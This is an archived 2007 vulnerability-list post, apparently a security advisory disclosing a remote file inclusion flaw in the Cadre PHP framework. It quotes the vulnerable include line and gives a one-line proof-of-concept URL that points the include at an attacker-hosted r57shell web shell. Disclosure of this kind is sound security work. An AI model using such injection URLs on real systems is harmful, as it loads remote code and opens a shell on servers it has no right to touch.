Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[ECHO_ADV_63$2007] Cadre remote file inclusion

from [y3dips] Network Security [Permanent Link]
Subject: [ECHO_ADV_63$2007] Cadre remote file inclusion
Date: 31 Jan 2007 12:20:11 -0000 
[ECHO_ADV_63$2007] Cadre remote file inclusion
-----------------------------------------------

Author          : Ahmad Muammar W.K (a.k.a) y3dips
Date Found      : January, 31st 2007
Location        : Indonesia, Jakarta
web             : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl    : Critical
------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Cadre
URL           : http://www.cronosys.com | 
http://savannah.gnu.org/projects/cadre/
Download-path : 
http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz

Description   : Cadre is a PHP framework for developing large business 
applications. 
                It currently supports PostgreSQL as the database back end 
(although 
                this is extensible). We (Cronosys, LLC) have invested two and a 
half 
                years in this framework and applications based on this 
framework.

------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

--------class.Quick_Config_Browser.php --------
        ...
        include_once($GLOBALS[config][framework_path] . "class.Browser.php");
        ...
        -------------------------------------


        An attacker can exploit this vulnerability with a simple php injection 
script.

Poc/Exploit:
~~~~~~~~~~~~

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/r57shell.php%20?

----------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

------------------------------------------------
Contact:
~~~~~~~~

     y3dips|| echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [ECHO_ADV_63$2007] Cadre remote file inclusion, y3dips <=
Previous by Date:  Oracle 10g R2 Enterprise Manager Directory Traversal, NGS Software Insight Security Research
Next by Date:  Re: Atsphp 5.0.1 [Top Sites] [index.php] - Remote File Include, Casey Marshall
Previous by Thread:  Oracle 10g R2 Enterprise Manager Directory Traversal, NGS Software Insight Security Research
Next by Thread:  [Full-disclosure] [ GLSA 200701-28 ] thttpd: Unauthenticated remote file access, Raphael Marichez
Indexes:  [Date] [Thread] [Top] [All Lists]